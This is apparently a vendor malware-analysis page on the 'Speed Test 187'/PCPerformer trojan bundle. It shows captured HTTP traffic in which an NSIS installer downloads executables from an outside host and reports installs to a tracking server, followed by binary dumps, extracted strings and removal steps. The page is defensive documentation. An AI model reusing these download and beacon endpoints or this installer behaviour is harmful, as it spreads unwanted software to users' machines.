Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: cid=4751; expires=Mon, 08-Sep-2014 02:05:12 GMT; path=/; domain=.zulagames.com<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><pre>ad............-....0.Ew..[..@ ...:1....E..6.0.....INnr....m"zP&.-....3<br>....o..YO6 .-... .......x.8.1...-.I..FV....;eG.}.A=..9...5..f.....D.Kz<br>......&...$.....^2....b.....?...y......0..HTTP/1.1 200 OK..Server: ngi<br>nx..Date: Sat, 09 Aug 2014 02:05:12 GMT..Content-Type: text/html..Tran<br>sfer-Encoding: chunked..Connection: keep-alive..Keep-Alive: timeout=2.<br>.Vary: Accept-Encoding..X-Powered-By: PHP/5.4.17..Set-Cookie: cid=4751<br>; expires=Mon, 08-Sep-2014 02:05:12 GMT; path=/; domain=.zulagames.com<br>..Set-Cookie: norjs=1; path=/..Content-Encoding: gzip..ad............-<br>....0.Ew..[..@ ...:1....E..6.0.....INnr....m"zP&.-....3....o..YO6 .-..<br>. .......x.8.1...-.I..FV....;eG.}.A=..9...5..f.....D.Kz......&...$....<br>.^2....b.....?...y......0..</pre></font><br><br
<font color="red">GET /pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: googleads.g.doubleclick.net<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://VVV.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br>
Set-Cookie: test_cookie=CheckForPermission; expires=Sat, 09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://googleads.g.doublecli<br>ck.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND<br> UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Date: Sat, 09 Aug 2<br>014 02:05:12 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00<br> GMT..Cache-Control: no-cache, must-revalidate..Location: hXXp://VVV.g<br>oogle.com/ads/conversion/993973503/?random=147077969&cv=7&fst=14075499<br>00333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&gu<br>id=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_n<br>plug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/%3<br>Fcid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&con<br>vclickts=0&random=2164007956..Content-Type: text/html; charset=UTF-8..<br>X-Content-Type-Options: nosniff..Content-Encoding: gzip..Server: cafe.<br>.Content-Length: 76..X-XSS-Protection: 1; mode=block..Alternate-Protoc<br>ol: 80:quic..Set-Cookie: test_cookie=CheckForPermission; expires=Sat, <br>09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net.............<br>.(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /js/geo2.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn3.optimizely.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: AmazonS3<br>
Content-Length: 291<br>
Content-Type: application/x-javascript<br>
x-amz-id-2: JfVu8nNGDGi l3p7HQACJzYVUDKQxkRKEngemu8HabWpc0Ftzt9DgqNrfAQfpTb5<br>
Vary: Accept-Encoding<br>
ETag: "adadfc5d7afd13e353d9d52cec1c7827"<br>
x-amz-request-id: 347C1B22ADFA7FF5<br>
Cache-Control: max-age=14454<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Connection: keep-alive<br><pre>(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi<br>ndow['optimizely'].push(['activateGeoDelayedExperiments', {.    'locat<br>ion':{.      'city': "KHARKIV",.      'continent': "EU",.      'countr<br>y': "UA",.      'region': "".    },.    'ip':"193.138.244.231".  }]);.<br>}).//.()..;..</pre></font><br><br
<font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: 8dfbdf8fe6e33a49e092cc761253a524a3b138c7<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 180<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:36","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"200654816","component_id":"705","cid":"4751","action":"install","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:48 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..HTTP/1.1 200 OK..Serve<br>r: nginx..Date: Sat, 09 Aug 2014 02:04:48 GMT..Content-Type: applicati<br>on/json..Transfer-Encoding: chunked..Connection: keep-alive..Keep-Aliv<br>e: timeout=2..Vary: Accept-Encoding..X-Powered-By: PHP/5.4.13..Access-<br>Control-Allow-Origin: *..27..{"flash":{},"error":false,"status":200}..<br>0..</pre></font><br><br
<font color="red">GET /service/country.php HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:36 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
X-Powered-By: PHP/5.3.16<br><pre>2..UA..0..HTTP/1.1 200 OK..Server: nginx/1.2.4..Date: Sat, 09 Aug 2014<br> 02:04:36 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co<br>nnection: keep-alive..X-Powered-By: PHP/5.3.16..2..UA..0..</font>....</pre></font><br><br><font color="red">GET /files/components/speedtest187Setup.exe HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:37 GMT<br>
Content-Type: application/octet-stream<br>
Content-Length: 1952545<br>
Last-Modified: Wed, 11 Jun 2014 12:05:16 GMT<br>
Connection: keep-alive<br>
Accept-Ranges: bytes<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$........#yd.B.7.B.7<br>.B.7..z7.B.7..l7.B.7.B.7.B.7.:.7.B.7...7.B.7.:.7.B.7Rich.B.7..........<br>..............PE..L....q.N.................d.......B...3............@.<br>.........................0............................................<br>........... ..........................................................<br>.....................................................text...@b.......d<br>.................. ..`.rdata...............h..............@[email protected]...<br>|[email protected]................................<br>...rsrc........ ......................@..@............................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>............................................U....\.}..t .}.F.E.u..H...<br>...G..H.P.u..u..u...|[email protected][email protected].....@<br>..}[email protected]... M..........M........E...FQ.....NU..M<br>.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u<br>[email protected]}[email protected].}.j.W.E......E.......P<br>[email protected][email protected][email protected] [email protected]..<br>...@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S..<br>...t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.</pre><<< skipped >>></font><br><br><font color="red">GET /files/products/PCPerformerSetup_genericv3.exe HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:47 GMT<br>
Content-Type: application/octet-stream<br>
Content-Length: 3343896<br>
Last-Modified: Tue, 13 May 2014 09:37:34 GMT<br>
Connection: keep-alive<br>
Accept-Ranges: bytes<br><pre>MZP.....................@.............................................<br>..!..L.!..This program must be run under Win32..$7....................<br>......................................................................<br>..............................................PE..L.....sP............<br>.........h....................@..................................u3...<br>[email protected].........<br>.....................................................r................<br>...............text...d........................... ..`.itext..,.......<br>.................... ..`[email protected]..<br>...V...............................idata.......p......................<br>@....tls.....................................rdata....................<br>..........@[email protected]..................@[email protected]..<br>....................@..@..............................................<br>......................................................................<br>[email protected]............<br>@...string([email protected]......@...............................@.....<br>.... 9@.([email protected]@[email protected]@[email protected]@..9@.,[email protected]@[email protected].%.sA....%.sA.<br>...%.sA....%.sA....%.sA....%.sA....%(sA....%.sA....%$sA....%.sA....%.s<br>A....%.sA....%.sA....%.sA....%|sA....%xsA....%tsA....%psA....%lsA....%<br>hsA....% sA....%dsA....%`sA....%\sA....%.sA....%.sA....%.sA....%XsA...<br>.%TsA....%.sA....%.sA....%.rA....%PsA....%LsA....%HsA....%DsA....%@sA.<br>..S..........$D...T.J....D$,.t...\$0....D[..@..%<sA....%8sA....</pre><<< skipped >>></font><br><br
<font color="red">GET /ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com.ua<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, no-store, must-revalidate<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: adclick_server<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 200 OK..Date: Sat, 09 Aug 2014 02:05:12 GMT..Pragma: no<br>-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cach<br>e, no-store, must-revalidate..Content-Type: text/html; charset=UTF-8..<br>X-Content-Type-Options: nosniff..Content-Encoding: gzip..Server: adcli<br>ck_server..Content-Length: 76..X-XSS-Protection: 1; mode=block..Altern<br>ate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N/./.K.M.../.*<br>)J. .H,J. Q......R`....h.?.....</pre></font><br><br
<font color="red">GET /jquery-1.9.1.min.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: code.jquery.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:06 GMT<br>
Content-Type: application/x-javascript; charset=utf-8<br>
Content-Length: 92629<br>
Connection: keep-alive<br>
Last-Modified: Wed, 26 Mar 2014 00:56:22 GMT<br>
Vary: Accept-Encoding<br>
ETag: "533225b6-169d5"<br>
Expires: Thu, 31 Dec 2037 23:55:55 GMT<br>
Cache-Control: max-age=315360000<br>
Cache-Control: public<br>
Server: NetDNA-cache/2.2<br>
X-Cache: HIT<br>
Accept-Ranges: bytes<br><pre>/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.or<br>g/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r<br>,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.<br>9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwn<br>Property,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[ -]<br>?(?:\d*\.|)\d (?:[eE][ -]?\d |)/.source,w=/\S /g,T=/^[\s\uFEFF\xA0] |[<br>\s\uFEFF\xA0] $/g,N=/^(?:(<[\w\W] >)[^>]*|#([\w-]*))$/,C=/^&l<br>t;(\w )\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:<br>\s*\[) /g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true<br>|false|null|-?(?:\d \.|)\d (?:[eE][ -]?\d |)/g,j=/^-ms-/,D=/-([\da-z])<br>/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventL<br>istener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())}<br>,q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoa<br>ded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onready<br>statechange",H),e.detachEvent("onload",H))};b.fn=b.prototype={jquery:p<br>,constructor:b,init:function(e,n,r){var i,a;if(!e)return this;if("stri<br>ng"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1<br>)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jqu<br>ery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanc<br>eof b?n[0]:n,b.merge(this,b.parseHTML(i[1],n&&n.nodeType?n.ownerDocume<br>nt||n:o,!0)),C.test(i[1])&&b.isPlainObject(n))for(i in n)b.isFunction(<br>this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(a=o.getEle</pre><<< skipped >>></font><br><br
<font color="red">GET /en_US/fbds.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: connect.facebook.net<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
ETag: "6aaf747cfda935915d39c54eabad63e0"<br>
Content-Type: application/x-javascript; charset=utf-8<br>
Timing-Allow-Origin: *<br>
Content-Encoding: gzip<br>
Content-MD5: gdTcR9t8u/1pp4CYgQDqRA==<br>
X-FB-Debug: PxXCzIgpHqdTL7T0IVsCfn vgDpO3D3TJLbQzx42ssQnVhIufa1778RCr7pUvGiR9x/U1gPYgDjlWtBFR0FK9A==<br>
Content-Length: 1546<br>
Cache-Control: public, max-age=1200<br>
Expires: Sat, 09 Aug 2014 02:25:12 GMT<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Connection: keep-alive<br>
Vary: Accept-Encoding<br><pre>...........VQS.6.~.W....8U.I.4g.&C.........fd[>.l..e..q.. ........Z<br>.V.O........w..y...kB>.}uN.(..B.J1w...o_.?xO....j...3...q...hU.J...<br>.y ..s&B.Sf.<..(y.T"....w>.,..~.8.sU... z`V$Z....i...'.j5.:.rv~v<br>rzqu.k.=...u6;n\[email protected]...}F.....{....K....iQ.....T...PRK.... . %&l<br>t;.!.7[..e$.g.\G._f$.C.(...?.......2pn]..^.2/..5..? ..i..J'^}.x.t. ...<br>..rq..".M..e...uv".B..t7}....Rs*z#S..=.......I..][email protected].")<br>2."Dj....;.v&_TY.U...l.2.$.h._Q.Q..8I..h.'..ULD2w1..J.T..S.".N..".....<br>.*.4?.xn..xs...9...|T.R#.3....S3....0....$a....t......m.i...a.#..#{.k.<br>w..3:..........Rs..&..>FGi.X...?..M.).|@s....{q..{w.T..nX..P......C<br>0......g./....$."..{.{GF.<P.1.Z..j .cG.._...=d/.@.(*.H....Z0f(i.5..<br>.r.|.G....e...).{.D.[.e.;..|.m.U.....{..d.>.i.b...t........U/....j.<br>....#...e.hC....J. ..gG....P/v.bn\..y...x#\C.bb.....!.....^.....h.5..p<br>W.f.d.....d=h...z..7.\4...(.!....7...jl.2D..A..fl.%".7.'.h.......]....<br>z.j...........N*...G....._.,.....].._/.K`..B...>F.........D.tx..Iw.<br>...".L....1].a..i.\.)Z"....b.............L.....G...E..s3K.$..5.._.o{.!<br>....S.}....gZ......1.yx.........4`.........l.wd.f...s........D>..lp<br>i!.u.....e..........o...]...L......V/]..,....=sL.!..Z.M7*.~.CZt.......<br>.SF<..;....>[email protected]`..E.7.5w_v..j=.2..LW...|1.<br>.z.. .....=..vd..7.....?...B..Q..R...z&R..,..b.F..I.z....m~..Xm.....:I<br>K...2U.....s{[email protected]*....<br>...q9.b.Hy...}.].._..z6q....\..i.........P>).C..,......j/....m&v~2.<br>._~.4!....V&sg31..&`..}...$..am...}a...}7...k..W.f.....RV*.......K</pre><<< skipped >>></font><br><br
<font color="red">GET /static/fonts/opensans/v9/cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE.eot HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: themes.googleusercontent.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Type: font/eot<br>
Last-Modified: Thu, 31 Jul 2014 00:49:13 GMT<br>
Date: Tue, 05 Aug 2014 13:54:52 GMT<br>
Expires: Wed, 05 Aug 2015 13:54:52 GMT<br>
Access-Control-Allow-Origin: *<br>
Timing-Allow-Origin: *<br>
X-Content-Type-Options: nosniff<br>
Server: sffe<br>
Content-Length: 18265<br>
X-XSS-Protection: 1; mode=block<br>
Cache-Control: public, max-age=31536000<br>
Age: 303014<br>
Alternate-Protocol: 80:quic<br><pre>..........u.sx%......83.mw...m....m..:.mt..:.....[k.s...w....w.g.....$<br>).`^.....4.............H.....9....}]R.0-..F...._}.&.......E.......!U..<br>?.......Of.p.........4.I\....8..4..........@TUR.?....5..).....f......-<br>Mx ../.<I.y......G..7.....uR.....q&.&6.-X..lDlx.....y..~..O.<...<br>......'}..q........=.1..qvW..S..I."\u.....0.X...V#w..'#..[.`L.........<br>...&.J!.5.d......i...MG..m=..k.T..\..&.-...C..Y.]D.L.... ...I..|.8....<br>7.]. ...B...[.J.9k...,..C...h.-*.4.....%Y]Q'....<..Ò.9\...qC,g...<br>....'<G_..|*.'.2=..q~9.7W,0......V.?sN..T..PJ9.}P]H......D!...K....<br>k...H3..F.N....J....._.....;H't....d.8.'].........}.V...EGb..]#76...oV<br>...VE.e..`fc.7...t...V...!.......^.qX..0T.....^...sZs%^....7.o..4z.i.V<br>2.d..B.E....)\......w.MV5.>.p...Mh}0...NE.JE.O .Y.F...N..'.........<br>G..O..E...G..BM.wx......L8..U...T..^..8......:....e..z-q......~......D<br>..=.fEf....;.w....P...b...X..Z/.....9*.......m..I..i.nG3.n.@){...P9{.b<br>du..voz..<q....e...8......v.A,..=.X..$..3ea...B. ..D..L....ow...7Q.<br>:...q.....9./....yg..c..keZ.... .^..,%G%..Y.p..O%.G\.........X."....n.<br>...6.*.Y...A.k...".N.....l...f..l....b..v..N.....E.A.6.e.6...%.....Y[.<br>.D...#.Z.{~{[email protected]`./2.^L....i....JQ."...s...<br>jW.Y....1.....|.6.=Y|....!...5K.|......'.....l......_..tQ..*Z..2....Q.<br>6...(C.,..B^..X...c..(m.n.7..(.Q.O.q"..\Od.".2.l....H......Gi.".b]..1{<br>.....X.....)C........7... ...C.i..tN....G1.]0*W....t.....".y1.X)...|..<br>..<.....[..^.....0.z...X.gJ.s.tcu....x.{..u(.N'........X.:..xQH..V.<br>1.z....a0.q...q.4.../dr..!t......_:[email protected]...=...2</pre><<< skipped >>></font><br><br

The Trojan connects to the servers at the folowing location(s):

iexplore.exe_1840:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

BackgroundHost.exe_1300:

.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
FRegDeleteKeyExW
RegDeleteKeyTransactedW
RegOpenKeyTransactedW
Kernel32.dll
Unicows.dll
RegCreateKeyTransactedW
IEIsProtectedModeURL
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
D:\work\projects\AddonsFrameworkForInstaller\Internet Explorer\Release\BackgroundHost.pdb
GdiplusShutdown
gdiplus.dll
HttpSendRequestW
HttpOpenRequestW
WININET.dll
GetProcessHeap
KERNEL32.dll
CreateDialogIndirectParamW
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
UrlCreateFromPathW
SHLWAPI.dll
GDI32.dll
urlmon.dll
GetCPInfo
.?AV?$CAtlExeModuleT@VCBackgroundHostModule@@@ATL@@
.?AV?$IDispEventImpl@$00VCBrowserFrame@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserFrame@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventImpl@$00VCPage5@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCPage5@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AVCWebCtrlInterFace@@
zcÁ
'BackgroundHost.EXE'
'­DONNAME%.BackgroundHostObject.1' = s 'BackgroundHostObject Class'
CLSID = s '%CLSIDclsIdBackgroundHostObject%'
'­DONNAME%.BackgroundHostObject' = s 'BackgroundHostObject Class'
CurVer = s '­DONNAME%.BackgroundHostObject.1'
ForceRemove %CLSIDclsIdBackgroundHostObject% = s 'BackgroundHostObject Class'
ProgID = s '­DONNAME%.BackgroundHostObject.1'
VersionIndependentProgID = s '­DONNAME%.BackgroundHostObject'
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Thu Oct 24 17:52:37 2013
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
6%6$7*7=7
<&< <=<`<
< <)</<8<
0$1(1,101
5%5$6*6=6
<!<%<)<-<
3%3U3
0%0U0
< <$<(<,<0<4<8<<<@<
5 5$5(5,5054585
8$8,888`8
= =@=\=`=
7(7,7074787<7`7
4 4$4(4,4044484<4@4
{16CE3BD9-5580-452e-9254-D8F5C02A8B9D}
config.xml
SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD\
{1F733841-2B64-466b-BE22-53A779CB3B29}
{lX-X-x-XX-XXXXXX}
GMscoree.dll
WAdvapi32.dll
OLEAUT32.DLL
Comctl32.dll
GKernel32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
W{18B9B16E-716F-43DF-A6AD-512C7D2EB983}
Econfig.xml
hXXp://besttoolbars.net/af_analytics
background.html
.Width
.Height
64.exe
ScriptHost.dll
BackgroundHost.exe
Bconfig.xml
hXXp://
BWebBrowserHtmlPage
Cconfig.xml
Powered by besttoolbars.net
//addon/key
uxtheme.dll
ieframe.dll
%s0x%.2x%.2x%.2x%.2x%.2x%.2x-
https
statUrl
MSXML2.XMLHTTP
ekernel32.dll
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
WUSER32.DLL
%Program Files%\Speed Test 187\BackgroundHost.exe
0.9.10.21


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    install_helper_FF.exe:500
    taskkill.exe:1964
    taskkill.exe:1240
    taskkill.exe:776
    BackgroundHost.exe:2036
    PCPerformerSetup.tmp:548
    %original file name%.exe:396
    PCPerformerSetup.exe:284
    PCPerformer.exe:476
    SpeedTest.exe:1220
    regsvr32.exe:788
